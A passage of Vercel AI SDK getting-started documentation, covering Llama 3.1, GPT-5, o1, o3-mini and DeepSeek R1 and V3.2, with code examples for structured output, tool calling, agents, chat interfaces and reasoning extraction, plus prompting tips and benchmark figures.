While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.

import { generateText, Output } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';

const { output } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(
          z.object({ name: z.string(), amount: z.string() }),
        ),
        steps: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Tools

Using Tools with the AI SDK

Here's an example of how you can use a tool with the AI SDK and Llama 3.1:

import { generateText, tool } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';

const { text } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  prompt: 'What is the weather like today?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
});

In this example, the getWeather tool allows the model to fetch real-time weather data, enhancing its ability to provide accurate and up-to-date information.

Agents

Agents take your AI applications a step further by allowing models to execute multiple steps (i.e. tools) in a non-deterministic way, making decisions based on context and user input.

Agents use LLMs to choose the next step in a problem-solving process. They can reason at each step and make decisions based on the evolving context.

Implementing Agents with the AI SDK

The AI SDK supports agent implementation through the stopWhen parameter and built-in stop conditions. This allows the model to make multiple decisions and tool calls in a single interaction.

Here's an example of an agent that solves math problems:

import { generateText, tool, isStepCount } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';
import * as mathjs from 'mathjs';
import { z } from 'zod';

const problem =
  'Calculate the profit for a day if revenue is $5000 and expenses are $3500.';

const { text: answer } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  system:
    'You are solving math problems. Reason step by step. Use the calculator when necessary.',
  prompt: problem,
  tools: {
    calculate: tool({
      description: 'A tool for evaluating mathematical expressions.',
      inputSchema: z.object({ expression: z.string() }),
      execute: async ({ expression }) => mathjs.evaluate(expression),
    }),
  },
  stopWhen: isStepCount(5),
});

In this example, the agent can use the calculator tool multiple times if needed, reasoning through the problem step by step.

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and Llama 3.1 (via DeepInfra):

import { deepinfra } from '@ai-sdk/deepinfra';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();

  const handleSubmit = (e: React.FormEvent<HTMLFormElement>) => {
    e.preventDefault();
    if (input.trim()) {
      sendMessage({ text: input });
      setInput('');
    }
  };

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) => {
            if (part.type === 'text') {
              return <span key={index}>{part.text}</span>;
            }
            return null;
          })}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

This enables a seamless chat experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.

Going Beyond Text

Let's dive into how you can leverage tools with AI SDK RSC to build a generative user interface with Next.js (App Router).

First, create a Server Action.

'use server';

import { streamUI } from '@ai-sdk/rsc';
import { deepinfra } from '@ai-sdk/deepinfra';
import { z } from 'zod';

export async function streamComponent() {
  const result = await streamUI({
    model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
    prompt: 'Get the weather for San Francisco',
    text: ({ content }) => <div>{content}</div>,
    tools: {
      getWeather: {
        description: 'Get the weather for a location',
        inputSchema: z.object({ location: z.string() }),
        generate: async function* ({ location }) {
          yield <div>loading...</div>;
          const weather = '25c'; // await getWeather(location);
          return (
            <div>
              the weather in {location} is {weather}.
            </div>
          );
        },
      },
    },
  });
  return result.value;
}

On the frontend, you can call this Server Action like any other asynchronous function in your application. In this case, the function returns a regular React component.

'use client';

import { useState } from 'react';
import { streamComponent } from './actions';

export default function Page() {
  const [component, setComponent] = useState<React.ReactNode>();

  return (
    <div>
      <form
        onSubmit={async e => {
          e.preventDefault();
          setComponent(await streamComponent());
        }}
      >
        <button>Stream Component</button>
      </form>
      <div>{component}</div>
    </div>
  );
}

To see AI SDK RSC in action, check out our open-source Next.js Gemini Chatbot.

Migrate from OpenAI

Here's how simple the migration process can be:

OpenAI Example:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('gpt-4.1'),
  prompt: 'What is love?',
});

Llama on DeepInfra Example:

import { generateText } from 'ai';
import { deepinfra } from '@ai-sdk/deepinfra';

const { text } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  prompt: 'What is love?',
});

Thanks to the unified API, the core structure of the code remains the same. The main differences are:

Creating a DeepInfra client
Changing the model name from openai("gpt-4.1") to deepinfra("meta-llama/Meta-Llama-3.1-70B-Instruct").

Prompt Engineering and Fine-tuning

While the Llama 3.1 family of models are powerful out-of-the-box, their performance can be enhanced through effective prompt engineering and fine-tuning techniques.

Prompt Engineering

For more information on prompt engineering techniques (specific to Llama models), check out these resources:

Fine-tuning

To learn more about fine-tuning Llama models, check out these resources:

Conclusion

The AI SDK ensures that your application remains clean and modular, accelerating development and future-proofing against the rapidly evolving landscape.

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Get started with GPT-5 description: Get started with GPT-5 using the AI SDK. tags: ['getting-started']

Get started with OpenAI GPT-5

OpenAI GPT-5

Prompt Engineering for GPT-5

Here are the key strategies for effective prompting:

Core Principles

Be precise and unambiguous: Avoid contradictory or ambiguous instructions. GPT-5 performs best with clear, explicit guidance.
Use structured prompts: Leverage XML-like tags to organize different sections of your instructions for better clarity.
Natural language works best: While being precise, write prompts as you would explain to a skilled colleague.

Prompting Techniques

1. Agentic Workflow Control

Adjust the reasoningEffort parameter to calibrate model autonomy
Set clear stop conditions and define explicit tool call budgets
Provide guidance on exploration depth and persistence

// Example with reasoning effort control
const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'Analyze this complex dataset and provide insights.',
  providerOptions: {
    openai: {
      reasoningEffort: 'high', // Increases autonomous exploration
    },
  },
});

2. Structured Prompt Format Use XML-like tags to organize your prompts:

<context_gathering>
Goal: Extract key performance metrics from the report
Method: Focus on quantitative data and year-over-year comparisons
Early stop criteria: Stop after finding 5 key metrics
</context_gathering>

<task>
Analyze the attached financial report and identify the most important metrics.
</task>

3. Tool Calling Best Practices

Use tool preambles to provide clear upfront plans
Define safe vs. unsafe actions for different tools
Create structured updates about tool call progress

4. Verbosity Control

Use the textVerbosity parameter to control response length programmatically
Override with natural language when needed for specific contexts
Balance between conciseness and completeness

5. Optimization Workflow

Start with a clear, simple prompt
Test and identify areas of ambiguity or confusion
Iteratively refine by removing contradictions
Consider using OpenAI's Prompt Optimizer tool for complex prompts
Document successful patterns for reuse

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI GPT-5 with the AI SDK:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('gpt-5'),
  prompt: 'Explain the concept of quantum entanglement.',
});

Generating Structured Data

While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.

import { generateText, Output } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { output } = await generateText({
  model: openai('gpt-5'),
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(
          z.object({ name: z.string(), amount: z.string() }),
        ),
        steps: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Verbosity Control

One of GPT-5's new features is verbosity control, allowing you to adjust response length without modifying your prompt:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Concise response
const { text: conciseText } = await generateText({
  model: openai('gpt-5'),
  prompt: 'Explain quantum computing.',
  providerOptions: {
    openai: {
      textVerbosity: 'low', // Produces terse, minimal responses
    },
  },
});

// Detailed response
const { text: detailedText } = await generateText({
  model: openai('gpt-5'),
  prompt: 'Explain quantum computing.',
  providerOptions: {
    openai: {
      textVerbosity: 'high', // Produces comprehensive, detailed responses
    },
  },
});

Web Search

GPT-5 can access real-time information through the integrated web search tool:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'What are the latest developments in AI this week?',
  tools: {
    web_search: openai.tools.webSearch({
      searchContextSize: 'high',
    }),
  },
});

// Access URL sources
const sources = result.sources;

Reasoning Summaries

For transparency into GPT-5's thought process, enable reasoning summaries:

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';

const result = streamText({
  model: openai('gpt-5'),
  prompt:
    'Solve this logic puzzle: If all roses are flowers and some flowers fade quickly, do all roses fade quickly?',
  providerOptions: {
    openai: {
      reasoningSummary: 'detailed', // 'auto' for condensed or 'detailed' for comprehensive
    },
  },
});

// Stream reasoning and text separately
for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    console.log(part.textDelta);
  } else if (part.type === 'text-delta') {
    process.stdout.write(part.textDelta);
  }
}

Using Tools with the AI SDK

GPT-5 supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:

import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { toolResults } = await generateText({
  model: openai('gpt-5'),
  prompt: 'What is the weather like today in San Francisco?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
});

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI GPT-5:

In a new Next.js application, first install the AI SDK and the OpenAI provider:

Then, create a route handler for the chat endpoint:

import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: openai('gpt-5'),
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat({});

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) => {
            if (part.type === 'text') {
              return <span key={index}>{part.text}</span>;
            }
            return null;
          })}
        </div>
      ))}
      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Get Started

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/cookbook to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/cookbook/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Get started with OpenAI o1 description: Get started with OpenAI o1 using the AI SDK. tags: ['getting-started', 'reasoning']

Get started with OpenAI o1

With the release of OpenAI's o1 series models, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.

OpenAI o1

The main reasoning model available in the API is:

o1: Designed to reason about hard problems using broad general knowledge about the world.

Model	Streaming	Tools	Object Generation	Reasoning Effort
o1

Benchmarks

OpenAI o1 models excel in scientific reasoning, with impressive performance across various domains:

Ranking in the 89th percentile on competitive programming questions (Codeforces)
Placing among the top 500 students in the US in a qualifier for the USA Math Olympiad (AIME)
Exceeding human PhD-level accuracy on a benchmark of physics, biology, and chemistry problems (GPQA)

Source

Prompt Engineering for o1 Models

Keep prompts simple and direct: The models excel at understanding and responding to brief, clear instructions without the need for extensive guidance.
Avoid chain-of-thought prompts: Since these models perform reasoning internally, prompting them to "think step by step" or "explain your reasoning" is unnecessary.
Use delimiters for clarity: Use delimiters like triple quotation marks, XML tags, or section titles to clearly indicate distinct parts of the input, helping the model interpret different sections appropriately.
Limit additional context in retrieval-augmented generation (RAG): When providing additional context or documents, include only the most relevant information to prevent the model from overcomplicating its response.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI o1 with the AI SDK:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('o1'),
  prompt: 'Explain the concept of quantum entanglement.',
});

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('o1'),
  prompt: 'Explain the concept of quantum entanglement.',
});

Refining Reasoning Effort

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Reduce reasoning effort for faster responses
const { text } = await generateText({
  model: openai('o1'),
  prompt: 'Explain quantum entanglement briefly.',
  providerOptions: {
    openai: { reasoningEffort: 'low' },
  },
});

Generating Structured Data

While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.

import { generateText, Output } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { output } = await generateText({
  model: openai('o1'),
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(
          z.object({ name: z.string(), amount: z.string() }),
        ),
        steps: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Structured object generation is supported with o1.

Tools

Using Tools with the AI SDK

Here's an example of how you can use a tool with the AI SDK and o1:

import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { text } = await generateText({
  model: openai('o1'),
  prompt: 'What is the weather like today?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
});

In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.

Tools are compatible with o1.

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI o1:

import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow responses up to 5 minutes
export const maxDuration = 300;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: openai('o1'),
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

'use client';

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const { messages, input, handleInputChange, handleSubmit, error } = useChat();

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.content}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input name="prompt" value={input} onChange={handleInputChange} />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Get Started

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out our support for the o1 series of reasoning models in the OpenAI Provider.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Get started with OpenAI o3-mini description: Get started with OpenAI o3-mini using the AI SDK. tags: ['getting-started', 'reasoning']

Get started with OpenAI o3-mini

With the release of OpenAI's o3-mini model, there has never been a better time to start building AI applications, particularly those that require complex STEM reasoning capabilities.

OpenAI o3-mini

o3-mini offers three reasoning effort levels:

[Low]: Optimized for speed while maintaining solid reasoning capabilities
[Medium]: Balanced approach matching o1's performance levels
[High]: Enhanced reasoning power exceeding o1 in many STEM domains

Model	Streaming	Tool Calling	Structured Output	Reasoning Effort	Image Input
o3-mini

Benchmarks

OpenAI o3-mini demonstrates impressive performance across technical domains:

87.3% accuracy on AIME competition math questions
79.7% accuracy on PhD-level science questions (GPQA Diamond)
2130 Elo rating on competitive programming (Codeforces)
49.3% accuracy on verified software engineering tasks (SWE-bench)

These benchmark results are using high reasoning effort setting.

Source

Prompt Engineering for o3-mini

Keep prompts simple and direct: The model excels at understanding and responding to brief, clear instructions without the need for extensive guidance.
Avoid chain-of-thought prompts: Since the model performs reasoning internally, prompting it to "think step by step" or "explain your reasoning" is unnecessary.
Use delimiters for clarity: Use delimiters like triple quotation marks, XML tags, or section titles to clearly indicate distinct parts of the input.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call OpenAI o3-mini with the AI SDK:

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

const { text } = await generateText({
  model: openai('o3-mini'),
  prompt: 'Explain the concept of quantum entanglement.',
});

Refining Reasoning Effort

import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';

// Reduce reasoning effort for faster responses
const { text } = await generateText({
  model: openai('o3-mini'),
  prompt: 'Explain quantum entanglement briefly.',
  providerOptions: {
    openai: { reasoningEffort: 'low' },
  },
});

Generating Structured Data

While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.

import { generateText, Output } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { output } = await generateText({
  model: openai('o3-mini'),
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(
          z.object({ name: z.string(), amount: z.string() }),
        ),
        steps: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

This code snippet will generate a type-safe recipe that conforms to the specified zod schema.

Using Tools with the AI SDK

o3-mini supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:

import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';

const { text } = await generateText({
  model: openai('o3-mini'),
  prompt: 'What is the weather like today in San Francisco?',
  tools: {
    getWeather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
});

In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI o3-mini:

In a new Next.js application, first install the AI SDK and the OpenAI provider:

Then, create a route handler for the chat endpoint:

import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow responses up to 5 minutes
export const maxDuration = 300;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: openai('o3-mini'),
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const { messages, input, handleInputChange, handleSubmit, error } = useChat();

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.content}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input name="prompt" value={input} onChange={handleInputChange} />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Get Started

Ready to get started? Here's how you can dive in:

Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
Check out our support for o3-mini in the OpenAI Provider.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.

title: Get started with DeepSeek R1 description: Get started with DeepSeek R1 using the AI SDK. tags: ['getting-started', 'reasoning']

Get started with DeepSeek R1

With the release of DeepSeek R1, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.

DeepSeek R1

The series includes two primary variants:

DeepSeek R1-Zero: Trained exclusively with reinforcement learning (RL) without any supervised fine-tuning. It exhibits advanced reasoning capabilities but may struggle with readability and formatting.
DeepSeek R1: Combines reinforcement learning with cold-start data and supervised fine-tuning to improve both reasoning performance and the readability of outputs.

Benchmarks

DeepSeek R1 models excel in reasoning tasks, delivering competitive performance across key benchmarks:

AIME 2024 (Pass@1): 79.8%
MATH-500 (Pass@1): 97.3%
Codeforces (Percentile): Top 4% (96.3%)
GPQA Diamond (Pass@1): 71.5%

Source

Prompt Engineering for DeepSeek R1 Models

DeepSeek R1 models excel with structured and straightforward prompts. The following best practices can help achieve optimal performance:

Use a structured format: Leverage the model’s preferred output structure with <think> tags for reasoning and <answer> tags for the final result.
Prefer zero-shot prompts: Avoid few-shot prompting as it can degrade performance; instead, directly state the problem clearly.
Specify output expectations: Guide the model by defining desired formats, such as markdown for readability or XML-like tags for clarity.

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call DeepSeek R1 with the AI SDK:

import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

const { reasoningText, text } = await generateText({
  model: deepseek('deepseek-reasoner'),
  prompt: 'Explain quantum entanglement.',
});

The unified interface also means that you can easily switch between providers by changing just two lines of code. For example, to use DeepSeek R1 via Fireworks:

import { fireworks } from '@ai-sdk/fireworks';
import {
  generateText,
  wrapLanguageModel,
  extractReasoningMiddleware,
} from 'ai';

// middleware to extract reasoning tokens
const enhancedModel = wrapLanguageModel({
  model: fireworks('accounts/fireworks/models/deepseek-r1'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

const { reasoningText, text } = await generateText({
  model: enhancedModel,
  prompt: 'Explain quantum entanglement.',
});

Or to use Groq's deepseek-r1-distill-llama-70b model:

import { groq } from '@ai-sdk/groq';
import {
  generateText,
  wrapLanguageModel,
  extractReasoningMiddleware,
} from 'ai';

// middleware to extract reasoning tokens
const enhancedModel = wrapLanguageModel({
  model: groq('deepseek-r1-distill-llama-70b'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

const { reasoningText, text } = await generateText({
  model: enhancedModel,
  prompt: 'Explain quantum entanglement.',
});

Model Provider Comparison

You can use DeepSeek R1 with the AI SDK through various providers. Here's a comparison of the providers that support DeepSeek R1:

Provider	Model ID	Reasoning Tokens
DeepSeek	`deepseek-reasoner`
Fireworks	`accounts/fireworks/models/deepseek-r1`	Requires Middleware
Groq	`deepseek-r1-distill-llama-70b`	Requires Middleware
Azure	`DeepSeek-R1`	Requires Middleware
Together AI	`deepseek-ai/DeepSeek-R1`	Requires Middleware
FriendliAI	`deepseek-r1`	Requires Middleware
LangDB	`deepseek/deepseek-reasoner`	Requires Middleware

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and DeepSeek R1:

In a new Next.js application, first install the AI SDK and the DeepSeek provider:

Then, create a route handler for the chat endpoint:

import { deepseek } from '@ai-sdk/deepseek';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: deepseek('deepseek-reasoner'),
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    sendReasoning: true,
  });
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();

  const handleSubmit = (e: React.FormEvent<HTMLFormElement>) => {
    e.preventDefault();
    if (input.trim()) {
      sendMessage({ text: input });
      setInput('');
    }
  };

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) => {
            if (part.type === 'reasoning') {
              return <pre key={index}>{part.text}</pre>;
            }
            if (part.type === 'text') {
              return <span key={index}>{part.text}</span>;
            }
            return null;
          })}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Limitations

While DeepSeek R1 models are powerful, they have certain limitations:

No tool-calling support: DeepSeek R1 cannot directly interact with APIs or external tools.
No object generation support: DeepSeek R1 does not support structured object generation. However, you can combine it with models that support structured object generation (like gpt-4o-mini) to generate objects. See the structured object generation with a reasoning model recipe for more information.

Get Started

Ready to dive in? Here's how you can begin:

Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
Use ready-to-deploy AI templates at vercel.com/templates?type=ai.

DeepSeek R1 opens new opportunities for reasoning-intensive AI applications. Start building today and leverage the power of advanced reasoning in your AI projects.

title: Get started with DeepSeek V3.2 description: Get started with DeepSeek V3.2 using the AI SDK. tags: ['getting-started', 'agents']

Get started with DeepSeek V3.2

With the release of DeepSeek V3.2, there has never been a better time to start building AI applications that require advanced reasoning and agentic capabilities.

DeepSeek V3.2

The series includes two primary variants:

DeepSeek V3.2: The official successor to V3.2-Exp. A balanced model optimized for both reasoning and inference efficiency, delivering GPT-5 level performance.
DeepSeek V3.2-Speciale: A high-compute variant with maxed-out reasoning capabilities that rivals Gemini-3.0-Pro. Achieves gold-medal performance in IMO 2025, CMO 2025, ICPC World Finals 2025, and IOI 2025. As of release, it does not support tool-use.

Benchmarks

DeepSeek V3.2 models excel in both reasoning and agentic tasks, delivering competitive performance across key benchmarks:

Reasoning Capabilities

AIME 2025 (Pass@1): 96.0% (Speciale)
HMMT 2025 (Pass@1): 99.2% (Speciale)
HLE (Pass@1): 30.6%
Codeforces (Rating): 2701 (Speciale)

Agentic Capabilities

SWE Verified (Resolved): 73.1%
Terminal Bench 2.0 (Acc): 46.4%
τ2 Bench (Pass@1): 80.3%
Tool Decathlon (Pass@1): 35.2%

Source

Model Options

When using DeepSeek V3.2 with the AI SDK, you have two model options:

Model Alias	Model Version	Description
`deepseek-chat`	DeepSeek-V3.2 (Non-thinking Mode)	Standard chat model
`deepseek-reasoner`	DeepSeek-V3.2 (Thinking Mode)	Enhanced reasoning for complex problem-solving

Getting Started with the AI SDK

The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building agents, and allows you to go beyond text output to generate rich, interactive components.

At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call DeepSeek V3.2 with the AI SDK:

import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

